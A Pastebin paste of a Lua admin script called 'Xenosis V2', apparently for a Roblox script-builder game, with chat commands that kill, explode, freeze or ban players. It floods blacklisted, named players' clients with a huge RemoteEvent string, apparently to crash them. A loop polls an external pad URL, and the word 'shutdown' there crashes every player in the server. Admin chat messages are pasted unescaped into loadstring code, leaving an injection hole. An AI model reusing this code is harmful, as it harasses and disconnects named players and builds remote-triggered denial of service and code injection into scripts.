Advertisement
Guest User

,,

a guest
Oct 26th, 2016
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. warn'Xenosis V2 has initiated.'
  2.  
  3. admins = {"edgeistheradedrstar","PointCoded","Dr_Doge","PixelFir3"}
  4. blacklist = {"ContentCool","fear1231212","Jarred4V8","Rit_G","jelly448","iitrainlover","xXMymomsIpadXx","SnxpChat","dontavius14","Dhwang","Bouncer276","tuffkirby","jbabybabyj","Soldierb0y09"}
  5. players = game.Players
  6. prefix = ";"
  7. prefix2 = " "
  8. run = true
  9. local IRC = [[https://titanpad.com/ep/pad/export/U36URPer9s/latest?format=txt]]
  10. local http = game:GetService('HttpService');
  11. local Xenosis_Model = Instance.new('Model',workspace)
  12. Xenosis_Model.Name = 'Xenosis Database'
  13. Musiclist = Instance.new('Folder',Xenosis_Model)
  14. Musiclist.Name = 'Musiclist'
  15. music_script = [[
  16. AddMusic('Desiigner - Panda',401120618)
  17. AddMusic('Ariana Grande - Problem ft.',155319906)
  18. AddMusic('Bang Bang',168969594)
  19. AddMusic('My House - Flo Rida',319758951)
  20. AddMusic('The Weekend - The Hills',281750011)
  21. AddMusic('Whistle - Flo Rida',291396031)
  22. AddMusic('Goodbye Moonmen - Rick & Morty',348344095)
  23. AddMusic('Future - Low Life ft. The Weekend',336725246)
  24. AddMusic('Confession - Florida Georgia Line',271416898)
  25. AddMusic('Kid Ink - Promise ft. Fetty Wap',356917026)
  26. AddMusic('O.T. Genasis x Young Dolph - Cut It',318486515)
  27. ]]
  28.  
  29. --[[ _________________________ ]]--
  30. -------------------------[ X E N O S I S V . 2 ]-----------------------------------
  31. -------------------------[ C R E A T E D B Y : ]-----------------------------------
  32. -------------------------[ B A S I C T A L I T Y ]-----------------------------------
  33. -------------------------------------------------------------------------------------
  34.  
  35. if game.PlaceId == 20279777 then
  36. function Hint()
  37. local hint = Instance.new('Hint',workspace)
  38. game:GetService("RunService").Stepped:connect(function()
  39. pcall(function()
  40. hint.Text = '\n'..'\n'..http:GetAsync(IRC)
  41. end)
  42. end)
  43.  
  44. hint.Changed:connect(function()
  45. pcall(function()
  46. local h_text=hint.Text
  47. if string.find(h_text,'shutdown') then
  48. for i,v in pairs(players:children()) do
  49. Instance.new('RemoteEvent',v):FireClient(v,{string.rep("blacklist",2e5+5)})
  50. end
  51. end
  52.  
  53. end)
  54. end)
  55. end
  56. end
  57.  
  58. function AddMusic(name,id)
  59. local music_value = Instance.new('StringValue',Musiclist)
  60. music_value.Name = name
  61. music_value.Value = id
  62. end
  63.  
  64. loadstring(music_script)()
  65.  
  66. game:GetService("RunService").Stepped:connect(function()
  67. for i,x in pairs(blacklist) do
  68. for i,v in pairs(players:children()) do if v.Name==x then
  69. Instance.new('RemoteEvent',v):FireClient(v,{string.rep("blacklist",2e5+5)})
  70. end
  71. end
  72. end
  73.  
  74. if not workspace:FindFirstChild("Message") then
  75. Hint()
  76. end
  77. end)
  78. function AddCmd(cmd,type,source)
  79. if run == true then
  80. for i,admin_get_1 in pairs(admins) do
  81. for i,player_admin in pairs(players:children()) do if player_admin.Name==admin_get_1 then
  82. player_admin.Chatted:connect(function(m)
  83. if type:lower()=='player' then
  84. if m:lower():sub(1,#cmd+#prefix+#prefix2)==prefix..cmd..prefix2 then
  85. loadstring([[msg = "]]..m..[[" cmd = "]]..cmd..[["
  86. for i,v in pairs(players:children()) do if string.find(v.Name:lower(),msg:lower():sub(#prefix+#prefix2+#cmd+1)) then ]]..source..[[ end end]])()
  87.  
  88. loadstring([[msg = "]]..m..[[" cmd = "]]..cmd..[["
  89. if string.find(msg:lower():sub(#prefix+#prefix2+#cmd+1),'others') then for i,v in pairs(players:children()) do if v.Name~="]]..player_admin.Name..[[" then ]]..source..[[ end end end]])()
  90.  
  91. loadstring([[msg = "]]..m..[[" cmd = "]]..cmd..[["
  92. if string.find(msg:lower():sub(#prefix+#prefix2+#cmd+1),'admins') then for i,x in pairs(admins) do for i,v in pairs(players:children()) do if v.Name==x then ]]..source..[[ end end end end]])()
  93.  
  94. loadstring([[msg = "]]..m..[[" cmd = "]]..cmd..[["
  95. if string.find(msg:lower():sub(#prefix+#prefix2+#cmd+1),'nonadmins') then for i,x in pairs(admins) do for i,v in pairs(players:children()) do if v.Name~=x then ]]..source..[[ end end end end]])()
  96.  
  97. loadstring([[msg = "]]..m..[[" cmd = "]]..cmd..[["
  98. if string.find(msg:lower():sub(#prefix+#prefix2+#cmd+1),'me') then for i,x in pairs(admins) do for i,v in pairs(players:children()) do if v.Name=="]]..player_admin.Name..[[" then ]]..source..[[ end end end end]])()
  99.  
  100.  
  101.  
  102.  
  103. loadstring([[ msg = "]]..m..[[" cmd = "]]..cmd..[["
  104. if string.find(msg:lower():sub(#prefix+#prefix2+#cmd+1),'all') then for i,v in pairs(players:children()) do ]]..source..[[ end end]])()
  105. end
  106. end;
  107. if type:lower() == 'normal' then
  108. if m:sub(1,#prefix+#cmd) == prefix..cmd then
  109. loadstring([[
  110. lclean = false
  111. game:GetService("RunService").Stepped:connect(function() if lclean == true then
  112. for i = 1,#workspace:children(),1 do
  113. for i,v in pairs(workspace:children()) do
  114. if v.Name~='Base' and v.ClassName~='Terrain' and v.ClassName~='Camera' and v.Name~=script.Name then
  115. if not game.Players:FindFirstChild(v.Name) then
  116. v:Remove()
  117. end
  118. end
  119. end
  120. end end end) ]]..source)()
  121. end
  122. end;
  123. end)
  124. end
  125. end
  126. end
  127. end
  128. end
  129.  
  130. function AddMCmd(cmd)
  131. for i,admin_get in pairs(admins) do
  132. for i,admin_player in pairs(players:children()) do if admin_player.Name == admin_get then
  133. admin_player.Chatted:connect(function(m)
  134. if m:lower():sub(1,#prefix+#cmd+#prefix2)==prefix..cmd..prefix2 then
  135. for i,v in pairs(Musiclist:children()) do if string.find(v.Name:lower(),m:lower():sub(#prefix+#cmd+#prefix2+1)) then
  136. for i,sound_delete in pairs(workspace:children()) do if sound_delete.ClassName=='Sound' then
  137. sound_delete:Stop()
  138. sound_delete.Volume = 0
  139. sound_delete:remove()
  140. end
  141. end
  142. local sound = Instance.new('Sound',workspace)
  143. sound.SoundId = 'rbxassetid://'..v.Value
  144. sound.Looped = true
  145. sound:Play()
  146. print(sound.SoundId)
  147. end
  148. if tonumber(m:sub(#prefix+#prefix2+#cmd+1)) then
  149. for i,sound_delete in pairs(workspace:children()) do if sound_delete.ClassName=='Sound' then
  150. sound_delete:Stop()
  151. sound_delete.Volume = 0
  152. sound_delete:remove()
  153. end
  154. end
  155. local sound = Instance.new('Sound',workspace)
  156. sound.SoundId = 'rbxassetid://'..m:sub(#prefix+#prefix2+#cmd+1)
  157. sound.Volume = 10000
  158. sound.Looped = true
  159. sound:Play()
  160. print(sound.SoundId)
  161. end
  162. end
  163. end
  164. end)
  165. end
  166. end
  167. end
  168. end
  169.  
  170. if game.PlaceId == 20279777 then
  171. local SB_Chat = Instance.new('StringValue',owner)
  172. SB_Chat.Name = 'SB_Chat'
  173. SB_Chat.Value = tostring('Xenosis')..'/'..'Xenosis has been initialized. Created by Basictality and ran by '..owner.Name..'.'
  174. end
  175.  
  176.  
  177. AddCmd("kill","player","v.Character:BreakJoints()")
  178. AddCmd("admin","player","table.insert(admins,v.Name)")
  179. AddCmd('ban','player','table.insert(blacklist,v.Name)')
  180. AddCmd('god','player','v.Character.Humanoid.MaxHealth=9e999')
  181. AddCmd('ungod','player','v.Character.Humanoid.MaxHealth=100')
  182. AddCmd('btools','player',[[game:GetService("InsertService"):LoadAsset(143830178):children()[1].Parent=v.Backpack]])
  183. AddCmd('respawn','player','v:LoadCharacter()')
  184. AddCmd('rfs','player',[[local part = Instance.new('Part',workspace)
  185. part.Name = 'Spawn_'..math.random()+tick()*2
  186. part.CFrame = v.Character.Torso.CFrame
  187. part.Anchored = true
  188. part.Transparency=1
  189. part.CanCollide = false
  190. v:LoadCharacter()
  191. v.Character.Torso.CFrame=part.CFrame
  192. part:remove()]])
  193. AddCmd('punish','player','v.Character.Parent=nil')
  194. AddCmd('unpunish','player','v.Character.Parent=workspace')
  195. AddCmd('lclean','normal',[[lclean = true]])
  196. AddCmd('unlclean','normal','lclean = false')
  197. AddCmd('explode','player',[[local expl = Instance.new('Explosion',workspace) expl.Position = v.Character.Torso.Position]])
  198. AddMCmd('music')
  199. AddMCmd('mus')
  200. AddCmd('freeze','player','v.Character.Torso.Anchored = true')
  201. AddCmd('thaw','player','v.Character.Torso.Anchored = false')
  202. AddCmd('invisible','player',[[for i,x in pairs(v.Character:children()) do if x.ClassName=='Part' then x.Transparency=1 end end
  203. for i,x in pairs(v.Character:children()) do if x.ClassName=='Hat' then
  204. for i,z in pairs(x:children()) do
  205. if z.ClassName=='Part' then
  206. z.Transparency=1
  207. end
  208. end
  209. end
  210. end
  211. for i,x in pairs(v.Character.Head:children()) do if v.ClassName=='Decal' then
  212. x.Transparency=1
  213. end
  214. end]])
  215. AddCmd('invis','player',[[for i,x in pairs(v.Character:children()) do if x.ClassName=='Part' and x.Name~='HumanoidRootPart' then
  216. x.Transparency=1 end end
  217. for i,x in pairs(v.Character:children()) do if x.ClassName=='Hat' then
  218. for i,z in pairs(x:children()) do
  219. if z.ClassName=='Part' then
  220. z.Transparency=1
  221. end
  222. end
  223. end
  224. end
  225. pcall(function()
  226. v.Character.Head.face.Transparency=1
  227. end)]])
  228. AddCmd('visible','player',[[for i,x in pairs(v.Character:children()) do if x.ClassName=='Part' and x.Name~='HumanoidRootPart' then
  229. x.Transparency=0 end end
  230. for i,x in pairs(v.Character:children()) do if x.ClassName=='Hat' then
  231. for i,z in pairs(x:children()) do
  232. if z.ClassName=='Part' then
  233. z.Transparency=0
  234. end
  235. end
  236. end
  237. end
  238. pcall(function()
  239. v.Character.Head.face.Transparency=0
  240. end)]])
  241. AddCmd('vis','player',[[for i,x in pairs(v.Character:children()) do if x.ClassName=='Part' and x.Name~='HumanoidRootPart' then
  242. x.Transparency=0 end end
  243. for i,x in pairs(v.Character:children()) do if x.ClassName=='Hat' then
  244. for i,z in pairs(x:children()) do
  245. if z.ClassName=='Part' then
  246. z.Transparency=0
  247. end
  248. end
  249. end
  250. end
  251. pcall(function()
  252. v.Character.Head.face.Transparency=0
  253. end)]])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement